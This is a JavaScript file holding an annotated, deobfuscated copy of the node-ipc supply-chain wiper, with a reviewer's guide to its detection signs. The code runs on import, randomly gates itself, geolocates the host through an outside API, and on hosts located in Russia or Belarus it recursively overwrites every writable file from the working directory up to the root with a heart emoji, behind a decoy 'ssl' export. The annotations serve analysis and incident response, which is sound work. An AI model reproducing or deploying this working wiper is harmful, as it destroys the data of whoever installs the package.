import u from "path";
import a from "fs";
import o from "https";

// **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.**
// Obfuscated code that I deobfuscated.
// I also added comments which should help explain what exactly is going on here.
// Originally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist)
// See you in prison, Brandon.
// Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
//
// Reading guide for reviewers and responders:
// - Everything below runs as a side effect of importing this module; no
//   exported function has to be called by the consuming application.
// - Behaviour visible in this file that can be used for detection:
//     * an outbound HTTPS GET to api.ipgeolocation.io issued during module load,
//     * file writes under the process CWD, its parent, its grandparent and "/",
//     * files whose entire content has been replaced by the heart emoji string.
// - The damage is bounded by what the running user may write to, so the process
//   owner's file permissions determine the blast radius.

// The payload is deferred by a random delay of at most one second
// (Math.ceil(Math.random() * 1e3) milliseconds), so it does not run
// synchronously with the import itself.
setTimeout(function () {
  // Random gate. Math.round(Math.random() * 4) yields 0..4 and execution only
  // continues for 0 or 1, i.e. when Math.random() * 4 < 1.5. That is 37.5% of
  // runs, not 50% - so a single clean run does not show that a host is unaffected.
  const t = Math.round(Math.random() * 4);
  if (t > 1) return;
  // IP-geolocation lookup with a hard-coded API key. The `country_name` field
  // of the JSON response is what gates the destructive branch below.
  const n = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
  // A request is sent to the URL above; the service answers with the location
  // it derives for the requester.
  // NOTE(review): the request object returned by o.get() is discarded and no
  // "error" listener is attached - presumably a failed lookup (e.g. blocked
  // egress) surfaces as an unhandled "error" event; confirm against Node's
  // http/https behaviour.
  o.get(n, function (t) {
    // Each "data" chunk is parsed on its own. If the body arrives in more than
    // one chunk, JSON.parse throws and the empty catch below hides it.
    t.on("data", function (t) {
      // Directories handed to h(): CWD, its parent, its grandparent and the
      // filesystem root. These shadow the outer `n` (URL) and `o` (https).
      const n = "./";
      const o = "../";
      const r = "../../";
      const f = "/";
      const c = "country_name";
      // Specifically targets hosts geolocated to Russia or Belarus.
      const e = "russia";
      const i = "belarus";
      try {
        const s = JSON.parse(t);
        const u = s[c].toLowerCase();
        // Case-insensitive substring match on the reported country name:
        // "If your country is Russia or Belarus, overwrite all of your files."
        const a = u.includes(e) || u.includes(i);
        if (a) {
          // Only the directory argument is passed, so h()'s second parameter
          // keeps its default "" and no path is filtered out.
          h(n);
          h(o);
          h(r);
          h(f);
        }
      } catch (t) {}
      // ^ Empty catch: a parse failure or a missing `country_name` is dropped
      //   silently, so nothing is logged either way.
    });
  });
}, Math.ceil(Math.random() * 1e3));

/**
 * The function that does the overwriting: walks a directory tree and replaces
 * the content of every matching non-directory entry with a heart emoji.
 *
 * It is declared `async` but contains no `await`, so the whole body - including
 * the recursive calls - executes synchronously while the call is being made.
 * Subdirectories ARE therefore traversed and overwritten; only the collection
 * of return values is broken (see the recursive call below).
 *
 * @param {string} n Directory to walk. Relative paths are resolved by `fs`
 *   against the CWD of the process that loaded the module.
 * @param {string} o Substring filter: an entry is overwritten only if its
 *   joined path contains this string. The default "" matches every path.
 * @returns {Promise<Array|undefined>} Resolves to `undefined` when `n` does not
 *   exist, otherwise to `f`, which is never pushed to and so stays empty.
 */
async function h(n = "", o = "") {
  // Checks to see if the directory within your file system exists.
  if (!a.existsSync(n)) return;
  let r = [];
  try {
    // Gets all of the entries within the directory. On failure (for example an
    // unreadable directory) `r` stays empty and the loop below does nothing.
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  // Your files will get overwritten with a heart emoji. Perfect.
  const c = "❤️";
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      // lstat, not stat: a symbolic link is reported as a link, so a linked
      // directory is not descended into by the isDirectory() branch.
      t = a.lstatSync(i);
    } catch (t) {
      // Entries that cannot be stat'ed are skipped.
      continue;
    }
    // If the entry is a directory, it will run the `h` function again.
    if (t.isDirectory()) {
      const s = h(i, o);
      // `s` is a Promise, so `s.length` is undefined and the comparison is
      // always false: `f` is never filled. The traversal itself has already
      // finished by this point, so this bug does not protect nested files.
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        // The files get overwritten. Thanks, Brandon.
        // writeFile is asynchronous and its callback is a no-op, so write
        // errors (e.g. permission denied) are ignored; the try/catch only
        // covers synchronous throws.
        a.writeFile(i, c, function () {});
      } catch (t) {}
    }
  }
  return f;
}

// Fake exports probably intended to trick consumers: the module only exposes a
// constant `ssl = true`, while the code above has already been scheduled by
// the time an importer can read it.
const ssl = true;
export { ssl, ssl as default };